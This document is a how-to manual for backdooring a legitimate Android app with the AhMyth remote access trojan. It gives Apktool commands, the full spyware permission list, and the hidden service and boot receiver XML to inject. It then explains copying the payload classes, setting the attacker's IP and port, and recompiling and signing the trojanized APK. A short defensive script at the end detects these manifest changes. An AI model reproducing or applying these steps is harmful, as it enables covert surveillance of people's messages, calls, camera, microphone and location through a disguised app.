# User Manual ‐ Manually Template Original Applications ‐ Boot Method
- Apktool
- A properly configured, decompiled AhMyth payload
- Patience
- Decompile the original application using Apktool.

```shell
apktool d original.apk
# or, if you run the jar directly:
java -jar apktool.jar d original.apk
```
- Enter the decompiled application folder and open `AndroidManifest.xml` in an editor such as Visual Studio Code or Sublime.
- Copy the payload permissions from the "Payload Permissions" dropdown tab below and add them alongside the original application's existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.
Payload Permissions

```xml
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>
```
ℹ️ Help

[Screenshot: Original Manifest Before Payload Permissions Injection]
[Screenshot: Original Manifest After Payload Permissions Injection]
The injected payload permissions are highlighted in red 🔴.
- Copy the payload Service below and insert it alongside the original application's existing services. If the original application's manifest has no existing services, insert it just before the closing `</application>` tag. Save the file. Follow the dropdown "Help" example for further help.

```xml
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
```
ℹ️ Help

If the manifest contains existing services, insert the payload service just after the original application's last existing service, like so:

[Screenshot: Original Manifest With Existing Services, Before Payload Service Injection]
[Screenshot: Original Manifest With Existing Services, After Payload Service Injection]
The injected payload Service is highlighted in red 🔴 and the application's last existing Service in blue 🔵.

If the manifest does not contain any existing services, insert the payload service just before the closing `</application>` tag, like so:

[Screenshot: Original Manifest Without Existing Services, Before Payload Service Injection]
[Screenshot: Original Manifest Without Existing Services, After Payload Service Injection]
The injected payload Service is highlighted in red 🔴 and the application's closing `</application>` tag in blue 🔵.
- Copy the payload Receiver below and insert it alongside the original application's existing receivers. If the original application's manifest has no existing receivers, insert it before the closing `</application>` tag but after the previously injected payload Service. Save the file. Follow the dropdown "Help" example for further help.

```xml
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>
```
ℹ️ Help

If the original application's manifest contains existing receivers, insert the payload receiver just after the application's last existing receiver, like so:

[Screenshot: Original Manifest With Existing Receivers, Before Payload Receiver Injection]
[Screenshot: Original Manifest With Existing Receivers, After Payload Receiver Injection]
The injected payload Receiver is highlighted in red 🔴, the application's last existing receiver tag in blue 🔵, and the previously injected payload Service in green 🟢.

If the manifest does not contain any existing receivers, insert the payload receiver just before the closing `</application>` tag, like so:

[Screenshot: Original Manifest Without Existing Receivers, Before Payload Receiver Injection]
[Screenshot: Original Manifest Without Existing Receivers, After Payload Receiver Injection]
The injected payload Receiver is highlighted in red 🔴, the closing `</application>` tag in blue 🔵, and the previously injected payload Service in green 🟢.
- Head into the decompiled APK folder of your AhMyth payload and enter the `smali` directory.
- Copy the payload folders inside the `smali` directory, excluding the `android` and `androidx` folders; these will be copied over later on.
- Head back into the decompiled original application we're backdooring and create a new `smali_classes(X)` directory (where "(X)" is the directory's number). See the dropdown tab below for how to number `smali_classes(X)` directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately

Creating `smali_classes(X)` directories isn't as hard as it sounds.

If the decompiled original application contains only one smali directory, that directory is always titled `smali`. In that case, create a new `smali_classes2` directory and paste the copied AhMyth payload folders into it.

[Screenshot: Before]
[Screenshot: After]

If the decompiled original application contains multiple smali directories, you have a list of numbered `smali_classes(X)` folders. To create the payload directory, follow that numbering: create a `smali_classes(X)` folder whose number is one higher than the last existing `smali_classes(X)` folder. For example, if the last existing folder is `smali_classes10`, create `smali_classes11`. The new directory's number should always be 1 more than the last existing `smali_classes(X)` folder.

[Screenshot: Before]
[Screenshot: After]
- Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.
- Head back into the `smali` folder of your decompiled AhMyth payload and copy the `android` and `androidx` folders.
- Paste the copied `android` and `androidx` folders into the `smali` folder of the decompiled original application, replacing files if prompted.
- After copying the `android` and `androidx` folders into the `smali` directory of the decompiled original application, edit the IP:PORT file titled `e.smali`, located at `smali_classesX/ahmyth/mine/king/ahmyth` (where `smali_classesX` is the payload directory created earlier for the AhMyth payload files), and apply your own IP address and port number. Save the file once you've done this.
- Close everything and recompile the backdoored application using Apktool.

```shell
apktool b original -o Ahmyth.apk
# or, if you run the jar directly:
java -jar apktool.jar b original -o Ahmyth.apk
```
- Sign the backdoored application using an APK signer. We recommend Uber APK Signer, as it not only signs the payload but also zipaligns it before signing.

```shell
# sign a single APK and write the result to an output folder
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder
# or sign every APK found in a folder
java -jar sign.jar -a path/to/folder/containing/the/payload
```
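For the analyst on the receiving end, the manifest edits described above leave a recognisable shape in any decompiled APK. The following triage script is an added example, not part of the AhMyth project: it parses a decompiled `AndroidManifest.xml`, matches the component names and permission list given on this page, and flags the exported `BOOT_COMPLETED` receiver paired with a broad permission set. The `com.example.notes` manifest it scans is constructed for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"  # ElementTree key for the android:name attribute
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"

# Component names taken from the payload snippets on this page.
KNOWN_COMPONENTS = {"ahmyth.mine.king.ahmyth.MainService", "ahmyth.mine.king.ahmyth.MyReceiver"}
# Permissions from the page's list that are most telling when they appear together.
SENSITIVE = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_CONTACTS", "android.permission.RECEIVE_BOOT_COMPLETED",
}

# Constructed sample: a notes app whose manifest was modified as the steps above describe.
SAMPLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Notes">
    <activity android:name="com.example.notes.MainActivity"/>
    <service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
    <receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
      <intent-filter><action android:name="{BOOT_ACTION}"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

def scan_manifest(xml_text: str) -> dict:
    """Flag known AhMyth components, boot-triggered receivers and sensitive permissions."""
    root = ET.fromstring(xml_text)
    perms = {e.get(NAME) for e in root.iter("uses-permission")}
    app = root.find("application")
    components = {e.get(NAME) for e in app.iter("service")} | {e.get(NAME) for e in app.iter("receiver")}
    boot_receivers = [r.get(NAME) for r in app.iter("receiver")
                      if any(a.get(NAME) == BOOT_ACTION for a in r.iter("action"))]
    known = sorted(components & KNOWN_COMPONENTS)
    sensitive = sorted(perms & SENSITIVE)
    # Known names are conclusive; a boot receiver plus a broad spy-style permission
    # set still merits review when the payload classes have been renamed.
    return {"known_components": known, "boot_receivers": boot_receivers,
            "sensitive_permissions": sensitive,
            "suspicious": bool(known) or (bool(boot_receivers) and len(sensitive) >= 4)}
```

Run `scan_manifest` over the `AndroidManifest.xml` that `apktool d` writes for a suspicious APK; a hit on `known_components` is conclusive, while the heuristic branch only points you at what to read next.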